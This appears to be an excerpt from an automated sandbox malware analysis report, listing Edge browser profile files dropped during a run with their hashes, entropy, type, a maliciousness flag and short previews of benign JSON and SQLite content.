C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5f4fff8b-46ad-4bb6-932e-7234e601710b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\70f25247-3006-4327-a63c-770886964773.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\71aa946e-26f0-4c87-a707-dc8a795c450b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336110615415376
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
MD5:	7D870539B6C4EE40FA5CFD87A3D4BFEC
SHA1:	F45BE07A3A05615856688219AFE6713EBABBAC2C
SHA-256:	73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
SHA-512:	90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.399790426504939
Encrypted:	false
SSDEEP:	96:ige+A8Ei42RdIL0TxAAc44j+E7m55w/LYXckzGY:igXEivdTOlFPywjYXcC5
MD5:	220A38D649C4141B4F03D43D05B0255A
SHA1:	456E6BE55E11445FCDE30813BBA6FB0EA338C41A
SHA-256:	46A8BCFFAA432648045C872576A89CAC30F1041AE5E6320D570FE33D4F720BED
SHA-512:	C455114AFDA4AE31E97A48CD2E705B092DF16E5DA1468659D262C8BC1C2D4E8D5B98BC3D94847645E0C51C3992D7CA52397D6CDD4C9A70BDA3B3BDA40EE21BED
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF50893.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.3238216207965467
Encrypted:	false
SSDEEP:	96:JkIEumQv8m1ccnvS6f+sptaD62R7/Kxcyv:+IEumQv8m1ccnvS6GIwD6I7/Nyv
MD5:	6D8099D7B50D6ADCD0F03955C39699EB
SHA1:	6761E54C262F72E6E9AEEB7B956A5CF6F3847AA1
SHA-256:	2A4C950B76BEF239DB7E525AB3B368F78F471A0959DFCB7BEDB683914B85B1A1
SHA-512:	51BD07AAE748EFFDB49C6FE2DB1A46F8C463B7B65B413B36AD6F76C4FB1F1D5C036C8A6A54927C08D112961D116B5E7689D3CC86A475026253C285309C955327
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF37262.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38137.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38473.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF47480.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries~RF49c9a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b967f539-b43a-4d9d-8662-fe9cb6ab6af2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\da821b93-9f54-4ed6-9c27-bc5edee337c2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8795710633235246
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJC8y7B62MoqsgC7zFy7S2z8ZI7J5fc:T+OUzDbg3r162M/sgCnR2ztc
MD5:	33DDE3794C3B05FABA777277F61EC4E7
SHA1:	824C0807E5345F8200FAE73EBC130071E08126C2
SHA-256:	502B296DC227590869D527C16290727B70D28033D6CDCEBD761065455268D1FC
SHA-512:	97DFD15AD8CB2C87FDAF5E8701B03A9EA6A9FF4E21E9967434256FB7CB4F3107A3E3E8F4680FE08A968A5505B1DF27DC3DF3558BB4D9FEF0B00FB1848E660476
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13255
Entropy (8bit):	5.219475857793956
Encrypted:	false
SSDEEP:	192:st4J99QTryDigabatSuyp7sogdsZihUkgM/NYn8hbV+Fu+QwCL66WjaFIMYXP7U8:st4PGKSu47sogdfhJBbGNQwP6WjaTYDN
MD5:	C7F98F05BAAB7E63239EF75E33B45563
SHA1:	0B68D90E5EB4600837C69F3F5E5BD4E7A2180D05
SHA-256:	960E7B6448363E4CBE0D437DDB125FD8FBA22043422C7B5F8ED0493E90EB35CA
SHA-512:	CAD33EC9DDE3CF87B1F3A2CAC319808DD8DD88E7B8D479A4A65671EE0BEBB5EAA60EF03752CA9FE2F1EED5658CBE9192D38FCAEAAFFB9BA78BC034F19BFB450F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3ab83.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13255
Entropy (8bit):	5.219475857793956
Encrypted:	false
SSDEEP:	192:st4J99QTryDigabatSuyp7sogdsZihUkgM/NYn8hbV+Fu+QwCL66WjaFIMYXP7U8:st4PGKSu47sogdfhJBbGNQwP6WjaTYDN
MD5:	C7F98F05BAAB7E63239EF75E33B45563
SHA1:	0B68D90E5EB4600837C69F3F5E5BD4E7A2180D05
SHA-256:	960E7B6448363E4CBE0D437DDB125FD8FBA22043422C7B5F8ED0493E90EB35CA
SHA-512:	CAD33EC9DDE3CF87B1F3A2CAC319808DD8DD88E7B8D479A4A65671EE0BEBB5EAA60EF03752CA9FE2F1EED5658CBE9192D38FCAEAAFFB9BA78BC034F19BFB450F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3f8c8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13255
Entropy (8bit):	5.219475857793956
Encrypted:	false
SSDEEP:	192:st4J99QTryDigabatSuyp7sogdsZihUkgM/NYn8hbV+Fu+QwCL66WjaFIMYXP7U8:st4PGKSu47sogdfhJBbGNQwP6WjaTYDN
MD5:	C7F98F05BAAB7E63239EF75E33B45563
SHA1:	0B68D90E5EB4600837C69F3F5E5BD4E7A2180D05
SHA-256:	960E7B6448363E4CBE0D437DDB125FD8FBA22043422C7B5F8ED0493E90EB35CA
SHA-512:	CAD33EC9DDE3CF87B1F3A2CAC319808DD8DD88E7B8D479A4A65671EE0BEBB5EAA60EF03752CA9FE2F1EED5658CBE9192D38FCAEAAFFB9BA78BC034F19BFB450F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF46de9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13255
Entropy (8bit):	5.219475857793956
Encrypted:	false
SSDEEP:	192:st4J99QTryDigabatSuyp7sogdsZihUkgM/NYn8hbV+Fu+QwCL66WjaFIMYXP7U8:st4PGKSu47sogdfhJBbGNQwP6WjaTYDN
MD5:	C7F98F05BAAB7E63239EF75E33B45563
SHA1:	0B68D90E5EB4600837C69F3F5E5BD4E7A2180D05
SHA-256:	960E7B6448363E4CBE0D437DDB125FD8FBA22043422C7B5F8ED0493E90EB35CA
SHA-512:	CAD33EC9DDE3CF87B1F3A2CAC319808DD8DD88E7B8D479A4A65671EE0BEBB5EAA60EF03752CA9FE2F1EED5658CBE9192D38FCAEAAFFB9BA78BC034F19BFB450F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF55cdd.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13255
Entropy (8bit):	5.219475857793956
Encrypted:	false
SSDEEP:	192:st4J99QTryDigabatSuyp7sogdsZihUkgM/NYn8hbV+Fu+QwCL66WjaFIMYXP7U8:st4PGKSu47sogdfhJBbGNQwP6WjaTYDN
MD5:	C7F98F05BAAB7E63239EF75E33B45563
SHA1:	0B68D90E5EB4600837C69F3F5E5BD4E7A2180D05
SHA-256:	960E7B6448363E4CBE0D437DDB125FD8FBA22043422C7B5F8ED0493E90EB35CA
SHA-512:	CAD33EC9DDE3CF87B1F3A2CAC319808DD8DD88E7B8D479A4A65671EE0BEBB5EAA60EF03752CA9FE2F1EED5658CBE9192D38FCAEAAFFB9BA78BC034F19BFB450F
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375684514153445","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF818b1.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13255
Entropy (8bit):	5.219475857793956
Encrypted:	false
